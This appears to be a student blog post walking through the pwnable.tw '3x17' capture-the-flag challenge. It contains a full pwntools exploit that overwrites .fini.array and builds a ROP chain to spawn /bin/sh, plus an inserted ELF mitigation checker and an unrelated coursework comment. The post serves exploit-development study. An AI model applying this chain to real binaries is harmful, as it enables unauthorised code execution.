Sunday, October 18, 2020

Its_just_a_b4by_c4ll_0riented_Pr0gramm1ng_in_3xit



This is the first post in a long series on vulnerability research and exploit development techniques.

Our target today: 3x17 from pwnable.tw.

Ahem, this post is based on v1cky's writeup (https://v1ckydxp.github.io/2019/04/26/pwnable-tw-3x17-writeup/).

Now, without further ado, ladies and gentlemen, let's get started.

First things first:

Binary information gathering

One of the first things to do when investigating a CTF task, even more so if it is a pwn one, is to check which mitigations are enabled. This can be done with the checksec utility.



Running checksec tells us that the binary has NX enabled (a non-executable stack) and no other mitigations. NX will not be a problem, because we can bypass it with ROP (return-oriented programming).
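Since the checksec output did not survive on this page, here is an added example (not from the original post or from v1cky's writeup) that reads the same facts directly from the ELF program headers: NX from PT_GNU_STACK, RELRO from PT_GNU_RELRO, PIE from e_type, plus whether a given address, such as the .fini.array address used later in this writeup, is still writable once RELRO has been applied. It assumes a little-endian ELF64 image; the images it checks are constructed in the code and are not the real 3x17 binary.

```python
import struct
# ELF64 constants from the ELF specification
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT = "<16sHHIQQQIHHHHHH"  # 64-byte ELF header, little-endian
PHDR_FMT = "<IIQQQQQQ"          # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align

def parse_phdrs(elf: bytes):
    """Return (e_type, [program header tuples]) for a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    hdr = struct.unpack_from(EHDR_FMT, elf, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    return e_type, [struct.unpack_from(PHDR_FMT, elf, e_phoff + i * e_phentsize) for i in range(e_phnum)]

def check_mitigations(elf: bytes) -> dict:
    """checksec-style summary: NX from PT_GNU_STACK flags, RELRO from PT_GNU_RELRO, PIE from e_type."""
    e_type, phdrs = parse_phdrs(elf)
    stack = [p for p in phdrs if p[0] == PT_GNU_STACK]
    return {
        "nx": bool(stack) and not (stack[0][1] & PF_X),     # no PT_GNU_STACK means an executable stack
        "relro": any(p[0] == PT_GNU_RELRO for p in phdrs),  # Full vs Partial also needs DT_BIND_NOW
        "pie": e_type == ET_DYN,
    }

def writable_after_relro(elf: bytes, vaddr: int) -> bool:
    """True if vaddr is in a writable PT_LOAD segment and outside every PT_GNU_RELRO range."""
    _, phdrs = parse_phdrs(elf)
    covers = lambda p: p[3] <= vaddr < p[3] + p[6]  # p_vaddr <= vaddr < p_vaddr + p_memsz
    in_w_load = any(p[0] == PT_LOAD and p[1] & PF_W and covers(p) for p in phdrs)
    return in_w_load and not any(p[0] == PT_GNU_RELRO and covers(p) for p in phdrs)

def build_elf(e_type: int, phdrs: list) -> bytes:
    """Construct a minimal ELF64 image (header + program headers only) as offline test input."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # 64-bit, little-endian, version 1
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 62, 1, 0x401000, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs)

# Constructed samples (not the real 3x17 binary): a text segment, a writable data segment that
# contains the .fini.array address quoted in the writeup, and a non-executable stack.
FINI_ARRAY = 0x4B40F0
BASE_PHDRS = [
    (PT_LOAD, PF_R | PF_X, 0, 0x400000, 0x400000, 0xB0000, 0xB0000, 0x1000),
    (PT_LOAD, PF_R | PF_W, 0xB0000, 0x4B0000, 0x4B0000, 0x5000, 0x8000, 0x1000),
    (PT_GNU_STACK, PF_R | PF_W, 0, 0, 0, 0, 0, 16),
]
SAMPLE_NO_RELRO = build_elf(ET_EXEC, BASE_PHDRS)
SAMPLE_RELRO = build_elf(ET_EXEC, BASE_PHDRS + [(PT_GNU_RELRO, PF_R, 0xB0000, 0x4B0000, 0x4B0000, 0x5000, 0x5000, 1)])
```

PT_GNU_RELRO only records the range the startup code is asked to make read-only; distinguishing Full from Partial RELRO additionally requires DT_BIND_NOW from the dynamic section, which this check does not read.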

Reverse Engineering the binary


Inspecting the main function, we see there is no vulnerability, just a "feature": we can write anything we want to any address. So we have a write-what-where primitive. But now, how do we get RCE?

RCE

This is similar to a challenge from HITCON. The author of this challenge wanted it to be solved in a specific way: by overwriting the .fini.array array. .fini.array is an array of function pointers that are executed after the program's normal execution ends. So if we can overwrite it, we get RCE once the binary finishes executing normally. One more thing to note: the functions saved in .fini.array are executed in reverse order, first .fini.array[1] and then .fini.array[0]. We can change .fini.array[1] to the address of main and .fini.array[0] to 0x402960, so that after main finishes, execution continues in the function that calls main (0x402960, loop_func_addr in the exploit). This turns the single arbitrary address overwrite into a loop of arbitrary writes. From there we just craft a /bin/sh ROP chain.

Here is the exploit:


```python
# -*- coding: utf-8 -*-
from pwn import *

context.arch = 'amd64'

#p = remote('chall.pwnable.tw',10105)
p = process('./3x17')

def send_data(addr, data):
    """One round of the binary's write-what-where: send the target address, then the bytes to write."""
    p.recvuntil(b'addr:')
    p.sendline(str(addr).encode())
    p.recvuntil(b'data:')
    p.send(data)

def pwn():
    fini_array_addr = 0x00000000004B40F0
    main_addr = 0x0000000000401B6D
    loop_func_addr = 0x0000000000402960
    main_leave_ret_addr = 0x0000000000401C4B

    # change .fini.array[1] = main_addr, .fini.array[0] = loop_func_addr
    send_data(fini_array_addr, p64(loop_func_addr) + p64(main_addr))
    print('change .fini.array')

    # rop (gadget names kept from the original; on this amd64 binary they pop rax/rdi/rsi/rdx)
    pop_eax_addr = 0x000000000041e4af
    pop_edi_addr = 0x0000000000401696
    pop_esi_addr = 0x0000000000406c30
    pop_edx_addr = 0x0000000000446e35
    syscall_addr = 0x0000000000471db5
    binsh_addr = 0x00000000004B4080
    start_addr = 0x00000000004B4100
    sys_read_addr = 0x0000000000446E2C

    # execve("/bin/sh", 0, 0): rax = 0x3b, rdi = "/bin/sh", rsi = 0, rdx = 0, then syscall
    send_data(start_addr, p64(pop_eax_addr) + p64(0x3b))
    send_data(start_addr + 16, p64(pop_edi_addr) + p64(binsh_addr))
    send_data(binsh_addr, b"/bin/sh\x00")

    send_data(start_addr + 32, p64(pop_esi_addr) + p64(0))
    send_data(start_addr + 48, p64(pop_edx_addr) + p64(0))
    send_data(start_addr + 64, p64(syscall_addr))
    # this is required: overwrite the first entry in the array to break out of the infinite loop
    # and ret into the chain placed right after .fini.array -> /bin/sh
    send_data(fini_array_addr, p64(main_leave_ret_addr))
    p.interactive()

pwn()
```

1 comment:

  1. Hi,

    As we have discussed during the class, we should have at least 10 posts before the approaching deadline of continuous assessment:

    • Introduction Post - 3
    1. Welcome
    2. Introduction
    3. Current skills
    • Initial Ideas on Major Project - 2
    1. Initial Idea One
    2. Initial Idea Two
    • Chosen Project Theme and Further Research Posts - 2/3
    1. Project Theme
    2. Computer Ethics (1/2 posts on this)
    • Project Plan - 2
    1. Project plan
    2. Gantt chart
    • Research Essay - 3
    1. Introduction
    2. Main Body
    3. Conclusion (including reference list in Harvard style of referencing)

    Many thanks
    Chirag

